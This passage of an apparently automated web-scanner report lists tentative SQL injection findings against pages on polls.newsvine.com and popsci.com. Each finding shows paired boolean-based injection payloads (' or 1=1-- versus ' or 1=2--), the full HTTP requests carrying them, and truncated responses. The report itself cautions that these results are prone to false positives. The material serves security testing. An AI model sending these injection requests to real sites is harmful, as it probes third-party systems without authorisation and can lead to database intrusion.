The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 20335452'%20or%201%3d1--%20 and 20335452'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_static20335452'%20or%201%3d1--%20/css/7df13afbd185e2574d9f79651dc425a61a7d8525.css HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:24 GMT
Content-Length: 15052
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&amp;x=0|26&amp;get=error-page&amp;rand=1588555597&amp;do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&amp;x=0|26&amp;get=error-page&amp;rand=1588555597&amp;do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.co
...[SNIP]...

Request 2

GET /_static20335452'%20or%201%3d2--%20/css/7df13afbd185e2574d9f79651dc425a61a7d8525.css HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:24 GMT
Content-Length: 15040
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&amp;x=0|26&amp;get=error-page&amp;rand=79981855&amp;do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&amp;x=0|26&amp;get=error-page&amp;rand=79981855&amp;do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.com/_v
...[SNIP]...

1.131. http://www.polls.newsvine.com/_static/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.polls.newsvine.com
Path:   /_static/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 11619636'%20or%201%3d1--%20 and 11619636'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_static11619636'%20or%201%3d1--%20/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:03:08 GMT
Content-Length: 15040
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&amp;x=0|26&amp;get=error-page&amp;rand=1745812082&amp;do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&amp;x=0|26&amp;get=error-page&amp;rand=1745812082&amp;do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.co
...[SNIP]...

Request 2

GET /_static11619636'%20or%201%3d2--%20/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:03:08 GMT
Content-Length: 15050
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&amp;x=0|26&amp;get=error-page&amp;rand=779034459&amp;do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&amp;x=0|26&amp;get=error-page&amp;rand=779034459&amp;do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.com/
...[SNIP]...

1.132. http://www.polls.newsvine.com/_vine/search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.polls.newsvine.com
Path:   /_vine/search

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 14284000%20or%201%3d1--%20 and 14284000%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_vine/search?114284000%20or%201%3d1--%20=1 HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:15:40 GMT
Content-Length: 17462
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<div id="pgNBCNV194750050" class="deferview_loadInViewport" data-callback="renderAd" data-divId="pgNBCNV194750050" data-acb="false" data-qs="&PG=NBCNV1&AP=1390&ONECLICK=1" data-fw="728" data-fh="90" ></div>
<script type="text/javascript">
if ((typeof(jQuery) == 'undefined' || typeof(DeferView) == 'undefined') && (typeof(dapMgr) != 'undefined')) {
   dapMgr.enableACB('pgNBCNV194750050', false);
   dapMgr.renderAd('pgNBCNV194750050', '&PG=NBCNV1&AP=1390&ONECLICK=1', 728, 90 );
}
</script>
   </div>


   <div class="conversations">
       <div style="margin: 0;"><img src="http://www.polls.newsvine.com/_vine/images/__/b_conversations.gif" width="57" height="14" style="margin:0 0 6px 0;" alt="Conversation Tracker" /></div>
       <a href="javascript:void(0);" onclick="showTracker('column');" class="conv_column" title="New comments from your Newsvine column"><span id="convColumnDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_column.gif" alt="Your Column" width="14" height="16" /></a>
       <a href="javascript:void(0);" onclick="showTracker('comments');" class="conv_elsewhere" title="New comments from articles you have commented on"><span id="convCommentsDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_elsewhere.gif" alt="Elsewhere" width="14" height="16" /></a>
       <a href="javascript:void(0);" onclick="showTracker('friends');" class="conv_friends" title="New comments from articles your friends have commented on"><span id="convFriendsDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_friends.gif" alt="Friends" width="14" height="16" /></a>
   </div>



</div>

<script language="javascript" type="text/javascript">var imgsrc = '?&ad=1:1:81;5::;12:12:47;44::';imgsrc += '&amp;x=0|26&amp;do=newsvine.com&amp;rand=587747336';if (document.referrer) { var refr = escape(document.referrer); imgsrc+='&rf='+refr; }document.write('<img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0"
...[SNIP]...

Request 2

GET /_vine/search?114284000%20or%201%3d2--%20=1 HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:15:40 GMT
Content-Length: 17472
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<div id="pgNBCNV11123326006" class="deferview_loadInViewport" data-callback="renderAd" data-divId="pgNBCNV11123326006" data-acb="false" data-qs="&PG=NBCNV1&AP=1390&ONECLICK=1" data-fw="728" data-fh="90" ></div>
<script type="text/javascript">
if ((typeof(jQuery) == 'undefined' || typeof(DeferView) == 'undefined') && (typeof(dapMgr) != 'undefined')) {
   dapMgr.enableACB('pgNBCNV11123326006', false);
   dapMgr.renderAd('pgNBCNV11123326006', '&PG=NBCNV1&AP=1390&ONECLICK=1', 728, 90 );
}
</script>
   </div>


   <div class="conversations">
       <div style="margin: 0;"><img src="http://www.polls.newsvine.com/_vine/images/__/b_conversations.gif" width="57" height="14" style="margin:0 0 6px 0;" alt="Conversation Tracker" /></div>
       <a href="javascript:void(0);" onclick="showTracker('column');" class="conv_column" title="New comments from your Newsvine column"><span id="convColumnDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_column.gif" alt="Your Column" width="14" height="16" /></a>
       <a href="javascript:void(0);" onclick="showTracker('comments');" class="conv_elsewhere" title="New comments from articles you have commented on"><span id="convCommentsDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_elsewhere.gif" alt="Elsewhere" width="14" height="16" /></a>
       <a href="javascript:void(0);" onclick="showTracker('friends');" class="conv_friends" title="New comments from articles your friends have commented on"><span id="convFriendsDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_friends.gif" alt="Friends" width="14" height="16" /></a>
   </div>



</div>

<script language="javascript" type="text/javascript">var imgsrc = '?&ad=1:1:81;5::;12:12:47;44::';imgsrc += '&amp;x=0|26&amp;do=newsvine.com&amp;rand=1296215061';if (document.referrer) { var refr = escape(document.referrer); imgsrc+='&rf='+refr; }document.write('<img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" h
...[SNIP]...

1.133. http://www.polls.newsvine.com/environment [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.polls.newsvine.com
Path:   /environment

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /environment?1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:18:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<div id="pgNBCNV1563085189" class="deferview_loadInViewport" data-callback="renderAd" data-divId="pgNBCNV1563085189" data-acb="false" data-qs="&PG=NBCNV1&AP=1390&ONECLICK=1" data-fw="728" data-fh="90" ></div>
<script type="text/javascript">
if ((typeof(jQuery) == 'undefined' || typeof(DeferView) == 'undefined') && (typeof(dapMgr) != 'undefined')) {
   dapMgr.enableACB('pgNBCNV1563085189', false);
   dapMgr.renderAd('pgNBCNV1563085189', '&PG=NBCNV1&AP=1390&ONECLICK=1', 728, 90 );
}
</script>
   </div>


   <div class="conversations">
       <div style="margin: 0;"><img src="http://www.polls.newsvine.com/_vine/images/__/b_conversations.gif" width="57" height="14" style="margin:0 0 6px 0;" alt="Conversation Tracker" /></div>
       <a href="javascript:void(0);" onclick="showTracker('column');" class="conv_column" title="New comments from your Newsvine column"><span id="convColumnDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_column.gif" alt="Your Column" width="14" height="16" /></a>
       <a href="javascript:void(0);" onclick="showTracker('comments');" class="conv_elsewhere" title="New comments from articles you have commented on"><span id="convCommentsDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_elsewhere.gif" alt="Elsewhere" width="14" height="16" /></a>
       <a href="javascript:void(0);" onclick="showTracker('friends');" class="conv_friends" title="New comments from articles your friends have commented on"><span id="convFriendsDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_friends.gif" alt="Friends" width="14" height="16" /></a>
   </div>



</div>

<script language="javascript" type="text/javascript">var imgsrc = '?&ad=40:1:81;5::;12:12:47;41:9:80;44::';imgsrc+= '&amp;get=s2066';imgsrc += '&amp;x=0|26&amp;do=newsvine.com&amp;rand=307281360';if (document.referrer) { var refr = escape(document.referrer); imgsrc+='&rf='+refr; }document.write('<img id="poke" src="http://log.newsvine.com/poke.gif
...[SNIP]...

Request 2

GET /environment?1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:18:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<div id="pgNBCNV11347823024" class="deferview_loadInViewport" data-callback="renderAd" data-divId="pgNBCNV11347823024" data-acb="false" data-qs="&PG=NBCNV1&AP=1390&ONECLICK=1" data-fw="728" data-fh="90" ></div>
<script type="text/javascript">
if ((typeof(jQuery) == 'undefined' || typeof(DeferView) == 'undefined') && (typeof(dapMgr) != 'undefined')) {
   dapMgr.enableACB('pgNBCNV11347823024', false);
   dapMgr.renderAd('pgNBCNV11347823024', '&PG=NBCNV1&AP=1390&ONECLICK=1', 728, 90 );
}
</script>
   </div>


   <div class="conversations">
       <div style="margin: 0;"><img src="http://www.polls.newsvine.com/_vine/images/__/b_conversations.gif" width="57" height="14" style="margin:0 0 6px 0;" alt="Conversation Tracker" /></div>
       <a href="javascript:void(0);" onclick="showTracker('column');" class="conv_column" title="New comments from your Newsvine column"><span id="convColumnDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_column.gif" alt="Your Column" width="14" height="16" /></a>
       <a href="javascript:void(0);" onclick="showTracker('comments');" class="conv_elsewhere" title="New comments from articles you have commented on"><span id="convCommentsDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_elsewhere.gif" alt="Elsewhere" width="14" height="16" /></a>
       <a href="javascript:void(0);" onclick="showTracker('friends');" class="conv_friends" title="New comments from articles your friends have commented on"><span id="convFriendsDiv_count">0</span><img src="http://www.polls.newsvine.com/_vine/images/__/icon_conv_friends.gif" alt="Friends" width="14" height="16" /></a>
   </div>



</div>

<script language="javascript" type="text/javascript">var imgsrc = '?&ad=40:1:81;5::;12:12:47;41:9:80;44::';imgsrc+= '&amp;get=s2066';imgsrc += '&amp;x=0|26&amp;do=newsvine.com&amp;rand=1895664269';if (document.referrer) { var refr = escape(document.referrer); imgsrc+='&rf='+refr; }document.write('<img id="poke" src="http://log.newsvine.com/pok
...[SNIP]...

1.134. http://www.popsci.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.popsci.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 72683569'%20or%201%3d1--%20 and 72683569'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?172683569'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.popsci.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:23:52 GMT
Server: Apache
Set-Cookie: SESS98684d1eb89eae890ac2d30814f7062d=v2tc6q1pdr66s599a60pjsel52; expires=Tue, 22-Feb-2011 06:57:12 GMT; path=/; domain=.popsci.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 30 Jan 2011 03:23:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
X-Server-Name: web4c D=414802
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-
...[SNIP]...
<a href="http://www.bmxmag.biz/existing.php" style="display: none;">bmxmag-ps</a></div>
<!-- Begin comScore Tag -->
<script>
document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js' %3E%3C/script%3E"));
</script>
<script>
COMSCORE.beacon({
c1:2,
c2:"6035029",
c3:" ",
c4:" ",
c5:"",
c6:"",
c15:" "
});
</script>
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035029&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
<!-- End comScore Tag --> <!-- Start Quantcast tag -->
<script type="text/javascript">
_qoptions={
qacct:"p-cafODhhaQOlCs"
};
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-cafODhhaQOlCs.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
<!-- End Quantcast tag --><!-- START Nielsen Online SiteCensus V6.0 -->
<!-- COPYRIGHT 2010 Nielsen Online -->
<script type="text/javascript">
(function () {
var d = new Image(1, 1);
d.onerror = d.onload = function () {
d.onerror = d.onload = null;
};
d.src = ["//secure-us.imrworldwide.com/cgi-bin/m?ci=us-903454h&cg=0&cc=1&si=", escape(window.location.href), "&rp=", escape(document.referrer), "&ts=compact&rnd=", (new Date()).getTime()].join('');
})();
</script>
<noscript>
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-903454h&amp;cg=0&amp;cc=1&amp;ts=noscript"
width="1" height="1" alt="" />
</div>
</noscript>
<!-- END Nielsen Online SiteCensus V6.0 -->
<!-- SiteCatalyst code version: H.13.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com --><script language="JavaScript"><!--
s_account="timepopsci"
//--></script>
<script language="JavaScript" src="/sites/all/modules/omniture/
...[SNIP]...

Request 2

GET /?172683569'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.popsci.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.0 200 OK
